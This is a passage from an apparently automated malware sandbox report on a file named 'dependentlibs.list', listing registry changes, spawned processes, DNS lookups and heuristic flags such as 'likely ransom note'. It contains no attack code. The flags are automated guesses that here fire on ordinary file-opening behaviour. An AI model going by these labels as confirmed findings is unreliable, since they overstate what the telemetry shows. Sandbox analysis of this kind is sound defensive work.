Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\.list C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\dependentlibs.list

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\dependentlibs.list

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\dependentlibs.list"

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2023-08-27 22:29

Reported

2023-08-27 22:32

Platform

win10v2004-20230703-en

Max time kernel

142s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\dependentlibs.list

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4868 wrote to memory of 216 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE
PID 4868 wrote to memory of 216 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\dependentlibs.list

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dependentlibs.list

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 126.128.241.8.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp

Files

N/A